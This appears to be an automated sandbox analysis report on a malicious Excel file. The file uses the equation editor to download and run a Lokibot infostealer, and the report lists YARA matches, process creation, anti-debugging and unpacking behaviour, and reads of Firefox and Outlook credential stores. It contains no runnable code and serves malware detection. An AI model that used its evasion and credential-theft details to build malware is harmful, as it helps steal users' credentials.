Source: 00000005.00000002.1285971294.00000000001B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: IBM_Centosie.exe PID: 2644, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: String function: 00405B6F appears 42 times
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: String function: 00407020 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
Source: MV_TRANS-ASIA_I.xls OLE indicator, VBA macros: true
Source: IBM_Centosie.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dwmfs[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: MV_TRANS-ASIA_I.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\MV_TRANS-ASIA_I.xls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLS@26/53@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: MV_TRANS-ASIA_I.xls OLE indicator, Workbook stream: true
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_00403890 OpenMutexA,FindResourceW,FindResourceA,DdeQueryStringW,_fputc,_puts, 14_2_00403890
Source: MV_TRANS-ASIA_I.xls ReversingLabs: Detection: 26%
Source: MV_TRANS-ASIA_I.xls Virustotal: Detection: 42%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe "C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe"
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Source: unknown Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe "C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe"
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges, 5_2_0040650A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR333F.tmp
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize, 5_2_0040434D
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_001B3780 CreateToolhelp32Snapshot,Module32First, 5_2_001B3780
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Mutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Command line argument: bibigeye 14_2_00403890
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Command line argument: Fiv 14_2_00403890
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Command line argument: Yutawi 14_2_00403890
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: ~WRD0001.tmp.6.dr Initial sample: OLE zip file path = word/embeddings/Microsoft_Excel_Worksheet1.xlsx
Source: ~WRD0004.tmp.6.dr Initial sample: OLE zip file path = word/embeddings/Microsoft_Excel_Worksheet1.xlsx
Source: ~WRD1135.tmp.6.dr Initial sample: OLE zip file path = word/embeddings/Microsoft_Excel_Worksheet1.xlsx
Source: ~WRD2285.tmp.6.dr Initial sample: OLE zip file path = word/embeddings/Microsoft_Excel_Worksheet1.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: MV_TRANS-ASIA_I.xls Static file information: File size 1436672 > 1048576
Source: Binary string: [C:\zocaka_wobihos\zaliwufanamin-xosusemof\81\duner.pdb source: IBM_Centosie.exe, 00000005.00000000.1068812593.0000000000401000.00000020.00000001.01000000.00000005.sdmp, IBM_Centosie.exe, 0000000E.00000002.1286061645.0000000000401000.00000020.00000001.01000000.00000005.sdmp, IBM_Centosie.exe, 0000000E.00000000.1245572476.0000000000401000.00000020.00000001.01000000.00000005.sdmp, IBM_Centosie.exe.2.dr, dwmfs[1].exe.2.dr
Source: Binary string: C:\zocaka_wobihos\zaliwufanamin-xosusemof\81\duner.pdb source: IBM_Centosie.exe, IBM_Centosie.exe, 0000000E.00000002.1286061645.0000000000401000.00000020.00000001.01000000.00000005.sdmp, IBM_Centosie.exe, 0000000E.00000000.1245572476.0000000000401000.00000020.00000001.01000000.00000005.sdmp, IBM_Centosie.exe.2.dr, dwmfs[1].exe.2.dr
Source: 819E.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Unpacked PE file: 5.2.IBM_Centosie.exe.400000.1.unpack
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Unpacked PE file: 5.2.IBM_Centosie.exe.400000.1.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.x:W;
Source: Yara match File source: 5.2.IBM_Centosie.exe.260e67.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.IBM_Centosie.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: IBM_Centosie.exe PID: 2644, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_00402AC0 push eax; ret 5_2_00402AD4
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_00402AC0 push eax; ret 5_2_00402AFC
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_001B7CB6 push ebp; ret 5_2_001B7CB9
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_001B50F2 push eax; ret 5_2_001B510D
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_001B59B1 push es; ret 5_2_001B59B3
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_001B86AE push edi; retf 5_2_001B86AF
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_001B8B08 push E83768D8h; retf 5_2_001B8B0D
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_001B93BB push ds; retf 5_2_001B93C3
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_00262D27 push eax; ret 5_2_00262D3B
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_00262D27 push eax; ret 5_2_00262D63
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_00407065 push ecx; ret 14_2_00407078
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_004034D0 push ecx; mov dword ptr [esp], 00000000h 14_2_004034D1
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_00421FE0 push eax; retf 14_2_00421FE1
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_0040A615 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 14_2_0040A615
Source: initial sample Static PE information: section name: .text entropy: 7.6608644971837885
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dwmfs[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe File created: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03640505 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_03640505
Source: MV_TRANS-ASIA_I.xls Stream path 'MBD001D392B/CONTENTS' entropy: 7.98177286202 (max. 8.0)
Source: MV_TRANS-ASIA_I.xls Stream path 'MBD001D392C/CONTENTS' entropy: 7.91669502048 (max. 8.0)
Source: MV_TRANS-ASIA_I.xls Stream path 'MBD001D392D/CONTENTS' entropy: 7.90090466154 (max. 8.0)
Source: MV_TRANS-ASIA_I.xls Stream path 'MBD001D392F/CONTENTS' entropy: 7.94631733096 (max. 8.0)
Source: MV_TRANS-ASIA_I.xls Stream path 'MBD001D3930/CONTENTS' entropy: 7.91669502048 (max. 8.0)
Source: MV_TRANS-ASIA_I.xls Stream path 'MBD001D3931/CONTENTS' entropy: 7.94924924846 (max. 8.0)
Source: MV_TRANS-ASIA_I.xls Stream path 'MBD001D3933/CONTENTS' entropy: 7.94631733096 (max. 8.0)
Source: MV_TRANS-ASIA_I.xls Stream path 'MBD001D3934/Package' entropy: 7.98610659657 (max. 8.0)
Source: MV_TRANS-ASIA_I.xls Stream path 'Workbook' entropy: 7.90099886459 (max. 8.0)
Source: ~WRF{9E2CC624-EAF0-4813-82C9-76A9DA993D34}.tmp.6.dr Stream path '_1751086122/Package' entropy: 7.96183395866 (max. 8.0)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3060 Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe TID: 2940 Thread sleep time: -120000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2256 Thread sleep time: -480000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe API coverage: 7.2 %
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Thread delayed: delay time: 60000
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 5_2_00403D74
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_0040A615 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 14_2_0040A615
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0364055F mov edx, dword ptr fs:[00000030h] 2_2_0364055F
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_0040317B mov eax, dword ptr fs:[00000030h] 5_2_0040317B
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_001B305D push dword ptr fs:[00000030h] 5_2_001B305D
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_0026092B mov eax, dword ptr fs:[00000030h] 5_2_0026092B
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_00260D90 mov eax, dword ptr fs:[00000030h] 5_2_00260D90
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_002633E2 mov eax, dword ptr fs:[00000030h] 5_2_002633E2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 12_2_0359055F mov edx, dword ptr fs:[00000030h] 12_2_0359055F
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_0040593F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 14_2_0040593F
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_00402B7C GetProcessHeap,RtlAllocateHeap, 5_2_00402B7C
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_00409509 SetUnhandledExceptionFilter, 14_2_00409509
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_0040593F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 14_2_0040593F
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_00403B11 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_00403B11
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_004077BA _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 14_2_004077BA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe "C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe"
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: GetLocaleInfoA, 14_2_0040C1CC
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_00409897 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 14_2_00409897
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_00406069 GetUserNameW, 5_2_00406069
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_00403510 ReadFile,_abort,GetModuleHandleW,GetProcAddress,VirtualProtect,GetVersionExA,GetVersionExW,GetConsoleAliasesA,GetVersionExA,GetVersionExW,GetConsoleAliasesA,SetClipboardViewer,GetTickCount,DisconnectNamedPipe,SetClipboardViewer,CharLowerBuffW,GetTickCount,DisconnectNamedPipe,CopyFileW,CharUpperBuffW,EnumDesktopWindows,UnhookWinEvent,CopyFileW,CharUpperBuffW,EnumDesktopWindows,UnhookWinEvent,LoadBitmapA,_lopen,IsValidCodePage,lstrlenW,SetProcessShutdownParameters,AddConsoleAliasA,GetCompressedFileSizeA,SetThreadPriority,SetCurrentDirectoryA,GetMenuBarInfo,CharToOemBuffA,CharUpperBuffA,GetMenuBarInfo,CharToOemBuffA,CharUpperBuffA,SetLastError,SetLastError,GetLastError,GetLastError,lstrcmpiW,lstrcmpiW,GetWindowsDirectoryW,CreateMutexW,GlobalAddAtomW,GetComputerNameW,GetWindowsDirectoryW,CreateMutexW,GlobalAddAtomW,GetComputerNameW,FileTimeToLocalFileTime,CreateMutexW,LoadLibraryW, 14_2_00403510

Stealing of Sensitive Information

Source: Yara match File source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: IBM_Centosie.exe PID: 2644, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
